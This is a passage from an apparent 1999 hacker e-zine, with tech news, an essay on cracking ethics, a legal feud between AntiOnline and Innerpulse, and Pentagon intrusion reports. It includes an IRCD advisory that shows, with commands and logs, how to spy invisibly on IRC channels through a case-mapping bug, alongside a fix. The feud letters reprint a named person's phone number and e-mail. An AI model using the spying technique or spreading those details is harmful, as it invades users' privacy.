  754.          reports that Microsoft has acknowledged a new bug discovered in 
  755.          Windows that locksa machine after 49.7 days of consecutive usage.
  756.          A fix is available now, and is expected to appear in the forthcoming
  757.          Windows 98 service release update, currently expected to be released
  758.          in April.  Microsoft's Personal Support Center has details.  
  759.      
  760.      ++  INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE
  761.          Mar 11th 
  762.          Contributed by Ed
  763.          Intel released a program that allows the user to turn off the serial
  764.          number of their new Pentium III chip, but Zero-Knowledge Systems 
  765.          claims it has developed an exploit which will retrieve the serial 
  766.          number wether the feature is turned on or off. I don't have one of
  767.          these chips to test this out on so can't confirm or deny this report.
  768.          
  769.          
  770.  
  771.      ++  BANK PLAN FOES LINE UP 
  772.       
  773.          http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html
  774.  
  775.  
  776.          Opponents of "Know Your Customer," a controversial plan by
  777.          the government to monitor individuals' banking activities,
  778.          will make their case on Capitol Hill. By Declan McCullagh.
  779.            
  780.  
  781.  
  782.      ++  DELL TO BUY BOATLOAD FROM IBM
  783.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html
  784.  
  785.  
  786.          Dell will buy about US$16 billion of chips, drives, and
  787.          monitors from IBM during the next seven years. It's a nice
  788.          boost to both companies.
  789.          
  790.  
  791.  
  792.      ++  CANADIAN TELECOM BEHEMOTH BORN
  793.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html
  794.  
  795.  
  796.      ++  AT&T Canada buys regional phone firm Metronet communications
  797.          in US$4.6 billion deal.
  798.            
  799.      ++  EUROPEAN TELECOMS: BUY, BUY, BUY 
  800.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html
  801.  
  802.          France's Alcatel agrees to buy another California Internet
  803.          company for US$350 million. And Germany's Seimens is
  804.          expected to spend $US1.7 billion on US
  805.          data-networking firms.
  806.            
  807.      ++  IT'S A LINUXWORLD AFTER ALL 
  808.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html
  809.  
  810.  
  811.          This week's conference is turning a tightknit community into
  812.          an international phenomenon. Not all of the new industry
  813.          stars are ready for the spotlight. Polly Sprenger reports
  814.          from San Jose, California.
  815.            
  816.  
  817.      ++  LINUX GETS OPEN-SOURCE GUI 
  818.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html
  819.  
  820.          Thanks to an interface lift, Linux is ready to star on the
  821.          desktop. GNOME marries components from familiar windowing
  822.          environments and adds a few things of its own. Leander
  823.          Kahney reports from San Jose, California.
  824.  
  825.      ++  NIPPING AT THE HEELS OF MP3 
  826.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html
  827.  
  828.          When high tech does battle on the Net, it's not always the
  829.          best tech that wins. This is the lesson that a smaller,
  830.          faster digital music format is learning in the face of MP3.
  831.          By Christopher Jones.
  832.            
  833.  
  834.      ++  TURNING DATA INTO DOLLARS 
  835.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html
  836.  
  837.          PeopleSoft stores information on about 30 million employees
  838.          worldwide. Now the company is looking to generate e-business
  839.          from its data banks, a plan that's raising eyebrows. By
  840.          Joanna Glasner.
  841.            
  842.  
  843.      ++  FROM COMDEX TO VENICE 
  844.          http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html
  845.  
  846.          The creator of one of the world's biggest computer-trade
  847.          shows builds the world's most high-tech hotel. Vince Beiser
  848.          reports from Las Vegas.           
  849.  
  850.  
  851.      ++  NO TIME FOR PAIN 
  852.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html
  853.  
  854.          A new therapy using electric current reduces chronic back
  855.          pain, according to a study in the Journal of the American
  856.          Medical Association. By Kristen Philipkoski.
  857.            
  858.  
  859.     ++   MONICA'S BIO, BYTE BY BYTE 
  860.          http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html
  861.  
  862.          Monica's Story, the Lewinsky memoir hitting bookstores on
  863.          Thursday, will be the first book published simultaneously in
  864.          e-book and paper form. By Steve Silberman.
  865.  
  866.  
  867.      ++  BIG INSIDER SALES AT YAHOO 
  868.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html
  869.  
  870.          Executives sold close to a million shares in February.
  871.          Analysts say this could be a red flag. By Jennifer Sullivan.
  872.            
  873.  
  874.      ++  SENATE HEARS Y2K LIABILITY ACT 
  875.          http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html
  876.  
  877.          Two senators introduce the latest legislation to head off a
  878.          raft of Year 2000 lawsuits arising from failed computer
  879.          systems. By Heidi Kriz.
  880.            
  881.  
  882.      ++  BRITS ON NET: JOLLY GOOD
  883.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html
  884.  
  885.          Ten thousand new Britons log on each day, a new poll reveals.
  886.          German newbies nip close at their their heels, but France
  887.          has a ways to go.
  888.           
  889.      ++  KING FOR THE DOMAINS IN SIGHT 
  890.          http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html
  891.  
  892.          The Internet Corporation for Assigned Names and Numbers
  893.          finalizes proposals that will lay down the law on .com -- as
  894.          well as .biz, .xxx, and other future top-level domains. By
  895.          Chris Oakes.
  896.      
  897.  
  898.      ++  GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday)
  899.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html
  900.  
  901.          Older investors looking to retire should stay away from
  902.          Internet stocks, the Federal Reserve chairman
  903.          tells Congress.
  904.      
  905.  
  906.      ++  CLINTON TABS PRIVACY POINT MAN (POL. Wednesday)
  907.          http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html
  908.  
  909.          An Ohio State law professor will represent the
  910.          administration's views concerning online privacy, an issue
  911.          which gains a little more momentum every day. By Declan
  912.          McCullagh and James Glave.
  913.      
  914.      ++  MUSIC INDUSTRY PLANS DVD AUDIO  
  915.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html
  916.          Record companies and technology companies agree on a
  917.          copy-protection framework for the successor to CDs. DVD
  918.          Audio is finally ready for consumers. By Christopher Jones.
  919.      
  920.      ++  DELL MORPHS INTO A RETAILER  
  921.          http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html
  922.  
  923.          The world's biggest direct seller of PCs hopes to become a
  924.          big online seller of consumer electronics too. Wednesday, it
  925.          launched its own online superstore.
  926.      
  927.  
  928.      ++  LINUX, MEET OPERA  
  929.          http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html
  930.  
  931.          Fans of Linux and Opera, which have both built support by
  932.          taking on the bigwigs, can now run the underdog browser on
  933.          the underdog OS.
  934.  
  935.  
  936.      Mucho thanks to Spikeman for directing his efforts to our cause of bringing
  937.      you the news we want to read about in a timely manner ... - Ed
  938.  
  939.      @HWA
  940.  
  941.  01.2 MAILBAG
  942.       ~~~~~~~
  943.           
  944.       Lots of mail, not much for sharing here though ... keep the letters coming!
  945.       but don't forget to include something I can print too... ;)
  946.                                . . . . . . .
  947.                                
  948.      
  949.  
  950.        // Written by NUL  (If you don't know, don't ask)
  951.        // http://come.to/hexx  (UnderConstruction)
  952.        // jeanclaude@canada.com
  953.        // 99/03/11
  954.        
  955.        
  956.        #include <If you want to, you can.>
  957.        
  958.        
  959.        
  960.        To start this off I would like to make one thing abundantly clear: I do not consider myself
  961.        a hacker.  I'm more interested in programing than anything else.  Sure, I've toiled a bit,
  962.        but I cannot be considered as one of the El33t.
  963.        
  964.        
  965.        The reason for which I am writing this little article is to try to place a bit of clairity
  966.        on the reasons for hacking / cracking (or at least trying to make sence of them).
  967.        
  968.        
  969.                                                   /*  */
  970.        
  971.        
  972.        Hacking, the original motto was to do no damage, but as time went by and people develloped
  973.        new skills, they decided that the original motto no longer applied to them.  Thus the cracker
  974.        was born.
  975.        
  976.        
  977.        Hacking and Cracking are two different entities.  You can not be both at the same time.  You
  978.        are either one or the other.  (For those of you who consider youselves as hackers or crackers
  979.        but use other peoples' scirpts to hack/crack, you are neither.  Anybody can point and click
  980.        their way along or run a programe which does all the work for you, it doesn't require any talent.)
  981.        
  982.        
  983.        
  984.        There are a few things that I find pointless in what the cracker community is doing:
  985.        
  986.        
  987.        First off:  What the hell is the point of saying a server's security is shit if you don't
  988.               help the server fix it???  What? Hack into it a second time?  (I know there are
  989.                a few groups out there who actually do help the servers they crack. This part
  990.                doesn't concern you.)
  991.        
  992.        
  993.        Second:     Why the hell do people think that they are Eleet when they use a script to
  994.                    determine what systems are vulnerable?  And exploit that vulnerability.
  995.                    Just because you know one or two tricks doesn't make you anything.
  996.        
  997.        
  998.        Third:      & what the hell is the point of writing in Eleet text?  It's all fine and dandy
  999.                    if you can't spell, but please, half the time you sound like you never got a high
  1000.                    school education!
  1001.        
  1002.        
  1003.        
  1004.        Power can only corrupt.  Crackers who devellope thier skills eventually loose control (though
  1005.        this isn't true for everybody) they can't help but feel destructive.  Though there are different
  1006.        levels of destructiveness (as I see it):
  1007.        
  1008.        
  1009.        A:  Destroying all information, just for the heck of it.
  1010.        B:  Destributing information / programs to ruin a business.
  1011.        C:  Defacing information.
  1012.        D:  Replacing information, but leaving a back-up copy.
  1013.        E:  Destroying all information, for good purposes.
  1014.        
  1015.        
  1016.        The last one (E) does fall into the category of cracking because it still is vandalisment of
  1017.        information even though it's for a good purpose (Cracking the KKK server(s) and destroying
  1018.        everything would be considered a class E).
  1019.        
  1020.        
  1021.        
  1022.        Ok, ok I know...  This did kindof turn out to be a bit differently then what it was supposed
  1023.        to be, but still I think I did manage to get a small message accross...
  1024.        
  1025.        // EOF                           
  1026.      
  1027.                                
  1028.      Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and
  1029.      tattooman among others ..
  1030.  
  1031.  
  1032.       @HWA
  1033.  
  1034.  
  1035.   02.0  From the editor.#9
  1036.         ~~~~~~~~~~~~~~~~~~
  1037.  
  1038.      #include <stdio.h>
  1039.      #include <thoughts.h>
  1040.      #include <backup.h>
  1041.  
  1042.      main()
  1043.      {
  1044.       printf ("Read commented source!\n\n");
  1045.  
  1046.      /*
  1047.       * Blech, fuck snow ... and overclocked chips that can't take the
  1048.       *heat even with oversize fans and sinks duct taped to them ... ;)
  1049.       *
  1050.       *Moving right along, thanks for the continued support everyone and tty next time...
  1051.       */
  1052.       printf ("EoF.\n");
  1053.       }
  1054.  
  1055.  
  1056.       w00t w00t w00t! ...
  1057.  
  1058.       w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
  1059.         1. A transcursion or transcendance into joy from an otherwise inert state
  1060.         2. Something Cruciphux can't go a day without typing on Efnet
  1061.  
  1062.       Congrats, thanks, articles, news submissions and kudos to us at the
  1063.      main address: hwa@press.usmc.net complaints and all nastygrams and
  1064.      mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
  1065.      127.0.0.1, private mail to cruciphux@dok.org
  1066.  
  1067.      danke.
  1068.  
  1069.      C*:.
  1070.  
  1071.  
  1072.      @HWA
  1073.  
  1074.  
  1075.  02.1 Demoniz trashcans his webboard
  1076.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1077.       
  1078.       Less than a month after the very cool bikkel security site closed down
  1079.       demoniz has pulled the plug on his webboard which he left running after
  1080.       closing down the main news site. Citing DoS attacks and spam as being
  1081.       the #1 reasons, it turns my stomach just to think of this...pulled from
  1082.       help net security's site.
  1083.       
  1084.       http://net-security.org/
  1085.  
  1086.       WEBBOARDS
  1087.       by deepcase, Monday 8th Mar 1999 on 1:34 pm CET
  1088.       Bikkel's Webboard which was first a project for a private webboard with
  1089.       user login and password is finally down. In an email i recieved from 
  1090.       demoniz he said "The board is offline for good. I gave my best shot, but
  1091.       it didn't work. The ingoing Denial of Service attacks on our server, the
  1092.       spams and the threats made me so sick that I removed it. I wont provide a
  1093.       service for a scene which is being dominated by little kids." Net Security
  1094.       will think about setting up a new webboard, but we arent sure about this yet.
  1095.  
  1096.       As a side note, we've set up a 'webboard' that is published by the beseen 
  1097.       company and it has seen no action as of yet, you might want to check it out
  1098.       and we can see how well it works (or doesn't as the case may be.) - Ed
  1099.       
  1100.       @HWA
  1101.  
  1102.  03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com
  1103.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1104.       From Innerpulse.com... 
  1105.  
  1106.       AntiOnline.com Threatens Legal Action
  1107.       Contributed by siko
  1108.       Thursday - March 04, 1999. 05:52PM GMT
  1109.  
  1110.       Following a rash of insults at AntiOnline.com, Founder John Vransisomething
  1111.       has threatened legal action against Innerpulse.com. Innerpulse has this
  1112.       statement for Mister AntiOnline:
  1113.  
  1114.        Talk your shit, grab your gat, call your click. But do not ever threaten
  1115.        Innerpulse with legal action unless you want some keys dropped.If you ain't
  1116.        ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck
  1117.        out of the ghetto. Don't try to tell me using the term 'antionline.com' is a
  1118.        violation of copyright laws. Its a fucking domain name. As for why we throw
  1119.        shit all over you name, this is a very good example of why. He went so far as to
  1120.        say the letter he sent me could not be reproduced without express written
  1121.        permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf
  1122.        on by. It would be the biggest bitch move in Internet history to launch a legal
  1123.        suit at opposition just because your feelings are hurt. Stop trying to be the
  1124.        Microsoft of the underground community. Nothing will be removed. Nothing
  1125.        will be discontinued. And I don't care if someone was stupid enough to invest
  1126.        60 billion in you. Why don't you go to antihell.com. Punk ass.
  1127.  
  1128.        Yeah, I posted it, What's Up Now Monkey? <link> http://innerpulse.com/jp.txt
  1129.  
  1130.        (The text from the above link appears in its entirety below - Ed)
  1131.  
  1132.        "<pre>aka Siko:
  1133.        I am sending you this letter to officially request that the content that
  1134.        relates to AntiOnline currently posted at the following URL be removed
  1135.        promptly: http://www.innerpulse.com/
  1136.  
  1137.        By references in your pages, I am sure that you are aware that
  1138.        "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
  1139.        rights to.  The language used on your page is not only inflammatory, it is
  1140.        flat out libelous. That content, combined with references to "AntiOnline"
  1141.        is what has led me to write this letter.
  1142.  
  1143.        While comedic parody is a protected first amendment right, knowingly
  1144.        printing false, libelous information about a company, in the context of it
  1145.        being news, so that others may believe it to be fact, is not.  We have
  1146.        received several e-mails from individuals questioning whether some of the
  1147.        information posted on your page, is factual news, or fictional writing.
  1148.  
  1149.        Also, the re-print of trademarks which are the property of another
  1150.        company, without written authorization, do not fall under first amendment
  1151.        rights.
  1152.  
  1153.        By sending you this letter, I am hoping that we can settle this matter
  1154.        without me being forced to seek a legal remedy. However, if you are not
  1155.        willing to cooperate with my requests, I may very well be forced into
  1156.        finding legal recourses, which may include a civil lawsuit.  You will
  1157.        receive
  1158.        no further communications from me directly.  If the content is not removed
  1159.        within 24 hours, this matter will be handed over to my legal council.
  1160.        Legal action may be filed shortly there after to recover damages done to
  1161.        AntiOnline's trade and reputation.
  1162.  
  1163.        A copy of this letter has been sent "blind carbon" to several third party
  1164.        individuals, so that it may be established that I have given you
  1165.        opportunity to remove the content voluntarily.
  1166.  
  1167.        If you have any questions regarding my request, you may contact me via an
  1168.        e-mail to jp@antionline.com or by phone at (724)773-0940.
  1169.  
  1170.        I would like to thank you in advance for what I hope will be a prompt
  1171.        response to my requests.
  1172.  
  1173.        Very Truly Yours,
  1174.        Mr. John Vranesevich
  1175.       General Partner, AntiOnline
  1176.  
  1177.       --------------------------------------------------------------------------------
  1178.       This letter is copyright 1999, AntiOnline LLP
  1179.       Reprint without written authorization is strictly prohibited...
  1180.       </pre>"
  1181.  
  1182.  
  1183.       Our Reply to JayPee <link> http://innerpulse.com/jp-reply.txt
  1184.  
  1185.        Hi,
  1186.  
  1187.        After I saw the e-mail you sent to siko I wanted to give you my idea
  1188.        on this issue, as I provide web hosting for Innerpulse.com and
  1189.        occasionally work on the website.  Response below.
  1190.  
  1191.        > aka Siko:
  1192.        >
  1193.        > I am sending you this letter to officially request that the content that
  1194.        > relates to AntiOnline currently posted at the following URL be removed
  1195.        > promptly: http://www.innerpulse.com/
  1196.  
  1197.        If you want to send an official letter, you don't use e-mail.  You can
  1198.        redirect official letters to our main administrative NOC at:
  1199.  
  1200.         [CubeSoft Communications]
  1201.         Cp2, Rr2, H.a.m
  1202.         Magdalen Islands, QC
  1203.         G0B 1K0 CANADA
  1204.  
  1205.        > By references in your pages, I am sure that you are aware that
  1206.        > "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
  1207.        > rights to.  The language used on your page is not only inflammatory, it is
  1208.        > flat out libelous. That content, combined with references to "AntiOnline"
  1209.        > is what has led me to write this letter.
  1210.  
  1211.        First of all, I think you should be consulting a lawyer about this.  I
  1212.        did, and I can tell you that mentionning the name "AntiOnline" in a news
  1213.        article is not libelous; as we never even put a link to your website (which
  1214.        would have not been legally wrong either).  Is mentionning "Microsoft" in a news
  1215.        article libelous? I don't think so.
  1216.  
  1217.        > While comedic parody is a protected first amendment right, knowingly
  1218.        > printing false, libelous information about a company, in the context of it
  1219.        > being news, so that others may believe it to be fact, is not.  We have
  1220.        > received several e-mails from individuals questioning whether some of the
  1221.        > information posted on your page, is factual news, or fictional writing.
  1222.  
  1223.        We don't want to take responsibility of the stupidity of your website's
  1224.        visitors. Tell them to redirect their comments and question to
  1225.        contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is
  1226.        true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse
  1227.        different.
  1228.  
  1229.        > Also, the re-print of trademarks which are the property of another
  1230.        > company, without written authorization, do not fall under first amendment
  1231.        > rights.
  1232.  
  1233.        Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from
  1234.        the INN features section.  Do you seriously think I would have wasted my
  1235.        time recopying AntiOnline's frontpage entirely?
  1236.  
  1237.        This may be not in the scope of your technical skills, but that is
  1238.        actually a link to a CGI script which simply acts as a proxy - it prints information
  1239.        directly from  AntiOnline.com, doing some word search/replaces in the process.  By
  1240.        changing the parameter you can do the same with any other website.
  1241.  
  1242.        > By sending you this letter, I am hoping that we can settle this matter
  1243.        > without me being forced to seek a legal remedy. However, if you are not
  1244.        > willing to cooperate with my requests, I may very well be forced into
  1245.        > finding legal recourses, which may include a civil lawsuit.  You will
  1246.        > receive
  1247.        > no further communications from me directly.  If the content is not removed
  1248.        > within 24 hours, this matter will be handed over to my legal council.
  1249.        > Legal action may be filed shortly there after to recover damages done to
  1250.        > AntiOnline's trade and reputation.
  1251.  
  1252.        I've been in that situation before, just an advice: don't even think
  1253.        about this, this will pass as a violation of free speech.  And by the way, who
  1254.        do you want to sue exactly?
  1255.  
  1256.        > A copy of this letter has been sent "blind carbon" to several third party
  1257.        > individuals, so that it may be established that I have given you
  1258.        > opportunity to remove the content voluntarily.
  1259.  
  1260.        I don't think so, John.
  1261.  
  1262.        > If you have any questions regarding my request, you may contact me via an
  1263.        > e-mail to jp@antionline.com or by phone at (724)773-0940.
  1264.        >
  1265.        > I would like to thank you in advance for what I hope will be a prompt
  1266.        > response to my requests.
  1267.        >
  1268.        > Very Truly Yours,
  1269.        > Mr. John Vranesevich
  1270.        > General Partner, AntiOnline
  1271.  
  1272.  
  1273.  
  1274.  
  1275.  
  1276.       @HWA
  1277.       
  1278.  03.1 The FPSC-IRCD.txt advisory.  
  1279.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1280.        
  1281.                             The FPSC-IRCD.txt advisory.
  1282.                             ---------------------------
  1283.                             By: syg of the FPSC @3/7/98
  1284.                                 ircd@FPSC.hemp.net
  1285.                                http://FPSC.hemp.net
  1286.        
  1287.        Program affected:
  1288.        IRCD
  1289.        
  1290.        Versions affected:
  1291.        All hybrid and other EFnet IRCD versions.  Probably others.
  1292.        
  1293.        Problem:
  1294.                According to the date of this file, thier is a few bugs in hybrid IRCD
  1295.        and  maybe  others.  I've checked DALnet's source and it seems thiers is fixed
  1296.        and not affected.  The bug is in match.c of the source code and starts on line
  1297.        204  at  'tolowertab[]'.  Note  the  line  that  consists  of  the  following:
  1298.        "'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',".  Then go to line 238
  1299.        in match.c to 'touppertab[]'.  Note the line that reads:
  1300.        "'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and  look at the two
  1301.        lines.  If you notice, it takes the '{' char and defines its uppercase char as
  1302.        '['  as along with defining '|' to '\', '}' to ']', and '~' to '^'.  What this
  1303.        means   is   thier  the  same  characters  in  channel  names  and  nicknames.
  1304.                Now  what  can  you  do with this in such a way it would be a problem?
  1305.        You  can  spy on channels that consist of any one of those 8 characters below:
  1306.        1) {     --Defined as LowerCase [
  1307.        2) [     --Defined as UpperCase {
  1308.        3) }     --Defined as LowerCase ]
  1309.        4) ]     --Defined as UpperCase }
  1310.        5) |     --Defined as LowerCase \
  1311.        6) \     --Defined as UpperCase |
  1312.        7) ~     --Defined as LowerCase ^
  1313.        8) ^     --Defined as UpperCase ~
  1314.        This problem and mIRC make a dangerous combination.  Lets say a bunch of your
  1315.        friends  hang  in  #mIRC]  and  you  run BitchX.  All  you have to do is join
  1316.        #mIRC}  and  thier mIRC clients wont see you join the channel which means you
  1317.        are  a  ghost  and  therefore  are  invisible.  Another  example  would be...
  1318.        two  people  are  in #Love^2 and you ran BitchX.  All you would have to do is
  1319.        join  #Love~2  and  they  wont  see  you join, therefore you can spy on thier
  1320.        conversation  all night long.  Now if one of the mIRC people happened to type
  1321.        "/names #mIRC]"  or  "/names #Love^2"  you would magically pop up in the nick
  1322.        list  of  the  channel.  That  is  also the same if someone joins the channel
  1323.        after you have joined, you will show up in thier names list therefore it will
  1324.        put  you in thier nick list in the channel window.  Be creative and have fun.
  1325.        
  1326.        
  1327.        Logs:
  1328.        The "->->->" is me telling you whats going on.
  1329.        ->->-> In mIRC I typed /join #[ with the nick mIRC-1
  1330.         *** Now talking in #[
  1331.        ->->-> No one is in the channel but me in the nick list.
  1332.        ->->-> Then I looked in my status window and got the join info.
  1333.         #[ @mIRC-1
  1334.         #[ End of /NAMES list.
  1335.         #[ created on Thu Feb 25 14:13:45
  1336.        ->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2
  1337.         *** Now talking in #{
  1338.        ->->-> No one is in the channel but me in the nick list.
  1339.        ->->-> Then I looked in my status window and got the join info.
  1340.         #[ mIRC-2 @mIRC-1
  1341.         #{ End of /NAMES list.
  1342.         #[ +
  1343.         #[ created on Thu Feb 25 14:13:45
  1344.        ->->-> NOTE: I can't see mIRC-1 in the nick list in the channel.
  1345.        ->->-> I also can't see mIRC-2 in mIRC-1's nick list.
  1346.        ->->-> So basically it's like two different channels when you are in mIRC.
  1347.        ->->-> Let's now bring bitchX into play...
  1348.        ->->-> In BitchX under the nick BitchX-1 i typed /join #[
  1349.         BitchX-1 [test@FPSC.hemp.net] has joined #[
  1350.         [Users(#[:3)]
  1351.         [ BitchX-1  ] [ mIRC-2  ] [@mIRC-1  ] 
  1352.         Channel #[ was created at Thu Feb 25 14:13:45 1999
  1353.         BitchX: Join to #[ was synced in 0.391 secs!
  1354.        ->->-> Now under mIRC-1's client I saw...
  1355.         *** BitchX-1 (test@FPSC.hemp.net) has joined #[
  1356.        ->->-> Which I should have because we are both in #[
  1357.        ->->-> But on the other hand, under mIRC-2's client( The one in #{ )...
  1358.        ->->-> I didn't see BitchX-1 join.
  1359.        ->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[
  1360.        ->->-> Now let me type with all three of them.
  1361.        ->->-> Under all three clients I will type thier nick and chan to the channel.
  1362.        ->->-> Under BitchX-1's client I saw all three clients talk...
  1363.         <mIRC-1> mIRC-1 #[
  1364.         <mIRC-2> mIRC-2 #{
  1365.         <BitchX-1> BitchX-1 #[
  1366.        ->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[)
  1367.         <mIRC-1> mIRC-1 #[
  1368.         <BitchX-1> BitchX-1 #[
  1369.        ->->-> Under mIRC-2's client I saw myself type only ( Im in #{ )
  1370.         <mIRC-2> mIRC-2 #{
  1371.        ->->-> As you can see mIRC-2 is being spy'd on by the BitchX client.
  1372.        ->->-> End of logs.
  1373.        
  1374.        Sollution:
  1375.                The fix would be to simply edit /src/match.c of the source code.  DALnet
  1376.        seems  to  have  a  nice  match.c at ftp.dal.net in df467.tgz if you EFnet staff
  1377.        need  any  ideas.  We all hope to see this fixed in your next release of hybrid.
  1378.        
  1379.        Final Notes:
  1380.                IRCD coders and staff members of all networks and all IRCD versions need
  1381.        to  check  your source for this bug and fix it before it gets abused... maybe it
  1382.        was  you  in  #^locals^ giving your phone number out to a friend which was being
  1383.        spy'd  on  by  another  local enemy.  Other than that, everyone keep up the good
  1384.        
  1385.        work  and so  long.  Also,  thanks  to  sate  for  helping  me  test  this  out.
  1386.        Questions/jobs/info/etc: ircd@FPSC.hemp.net  -syg 
  1387.       
  1388.       @HWA
  1389.  
  1390.  04.0 Pentagon under attack
  1391.       ~~~~~~~~~~~~~~~~~~~~~
  1392.       March 7th, 1999
  1393.       From http://www.hackernews.com/
  1394.  
  1395.       Pentagon investigates Russian cyberattacks
  1396.  
  1397.       contributed to HNN by Bronc
  1398.  
  1399.       A probe has been launched into recent efforts of crackers attempting to
  1400.       access Pentagon computer systems. Pentagon officials are unsure if this
  1401.       is a coordinated attack or the work of separate individuals.
  1402.  
  1403.       Early indications show that many of the attacks have originated in Russia
  1404.       and may have had the assistance of a insider. No classified networks have
  1405.       yet been breached. U.S. Deputy Defense Secretary John Hamre has been
  1406.       quoted as saying "It is a major concern." (Ed Note: This is the same John
  1407.       Hamre who last year was quoted as saying "This is the most coordinated
  1408.       attack we have seen to date" when referring to attacks on government
  1409.       systems by three teenagers.)
  1410.  
  1411.       Follow up here:
  1412.  
  1413.        http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html
  1414.        http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html
  1415.        http://www.msnbc.com/news/246801.asp
  1416.        http://www.smh.com.au/news/9903/05/breaking2/news1.html
  1417.  
  1418.       And from Innerpulse.com; www.innerpulse.com
  1419.  
  1420.       United States: Cyberwar?
  1421.       Contributed to Innerpulse by siko
  1422.       Sunday - March 07, 1999. 06:10PM GMT
  1423.  
  1424.       Innerpulse has decided not to join the media inflated 'Cyberwar' reporting
  1425.       until today. We have been doing extensive research and have discovered some
  1426.       exclusive details.
  1427.  
  1428.       We all know the so called 'facts'. Coordinated attacks on certain servers have
  1429.       officials at the Pentagon looking for answers, and quickly. What certain people
  1430.       forget, is that the man who said this is the most organized attack to date, is also
  1431.       the man that said a 16 year old kid named 'Makeveli' had also launched an
  1432.       extremely organized attack on government servers. For those who aren't into
  1433.       the urban musical subculture, Makeveli most likely came from the popular
  1434.       rapper, Tupac's influence. They have stated the attacks are coming from
  1435.       Canada and Thailand amongst others. Yet they can not trace any further.
  1436.       Sorry, if you can tell the country than you have the IP, and the ability to find the
  1437.       source.
  1438.  
  1439.       The United States is not at Cyberwar with anyone but the media, who took a
  1440.       couple of failed hack attempts and turned it into World War III. Innerpulse has
  1441.       conducted various interviews and can now finger the source of this terror. His
  1442.       name is John Vranesevich, which traces back to packetz.antionline.com. In an
  1443.       effort to get more publicity for breaking a story, he blew up a situation leading
  1444.       many respected news outlets into believeing this was actually as blown out of
  1445.       proportion as he made it sound. And on top of that, they pick Hamre, the man
  1446.       who called an Undernet hacker named 'Makeveli', a serious threat the the
  1447.       United States National Security.
  1448.  
  1449.       The Pentagon may be experiencing more attacks lately. This is not blown out of
  1450.       proportion. But if you take a moment to question the motives of people who
  1451.       would attempt to crack into a government server.. Perhaps because it gains you
  1452.       recognition and fame as it has done for so many in the past? This is the same
  1453.       reason antionline.com gets lots of crack attempts every day, because almost
  1454.       everyone in the 'hacker' community wants to be known for breaking the site
  1455.       that sold out.
  1456.  
  1457.       The United States is not currently involved in a Cyber War, never has been, and
  1458.       most likely will not be in any of our reader's lifetimes.
  1459.  
  1460.       But, if someone really cracks a Pentagon server and fires a missile at me, boy
  1461.       won't I feel silly.
  1462.  
  1463.       And a fairly intelligent article with little FUD from ABC news...
  1464.       
  1465.       http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html
  1466.       
  1467.       
  1468.       Pentagon Attacks Overblown?
  1469.       Hackers Complain Government Computers Over-Sensitive 
  1470.  
  1471.       By Michael J. Martinez
  1472.       ABCNEWS.com
  1473.       March 9  Last week, the Pentagon reported
  1474.       that over the last several months its computer
  1475.       systems have withstood an unprecedented and
  1476.       concerted series of external attacks. 
  1477.  
  1478.  
  1479.       U.S.-based hackers might simulate an attack from abroad by routing
  1480.       their signals through a series of far-flung servers. (ABCNEWS.com)
  1481.  
  1482.       Deputy Defense Secretary John Hamre confirmed the
  1483.       attacks, calling them a major concern. Pentagon officials
  1484.       stated that the electronic infiltrations have come from
  1485.       abroad most likely Russia. To Pentagon watchers, and to members of the 
  1486.       loosely knit hacker fraternity in the United States, those claims
  1487.       sounded familiar. 
  1488.  
  1489.       Terrorists or Teens?
  1490.       
  1491.       Last February, Hamre announced that the Pentagon was undergoing
  1492.       the most intense, coordinated cyberattack it had ever seen. Over a 
  1493.       two-week period, unknown hackers launched coordinated attacks against
  1494.       hundreds of military domains and servers. 
  1495.                       
  1496.       After weeks of investigation, the culprits were nabbed. They turned 
  1497.       out to be an 18-year-old Israeli computer enthusiast with a lot of
  1498.       time on his hands, and two teenagers from California who were using 
  1499.       readily available software tools downloaded from the Internet to 
  1500.       discredit the PentagonÆs computer security. No hackers claimed credit
  1501.       for the latest assaults; there was no bragging in IRC chat rooms or 
  1502.       on Web pages, as typically happens after well-publicized computer 
  1503.       attacks on government systems. 
